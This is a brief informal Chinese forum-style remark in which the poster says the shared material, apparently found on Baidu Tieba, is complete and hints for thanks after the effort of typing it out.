就这么多了,附加式在贴吧了翻到的,打了我好半天看我那么辛苦的份上......(不用我说了吧- -)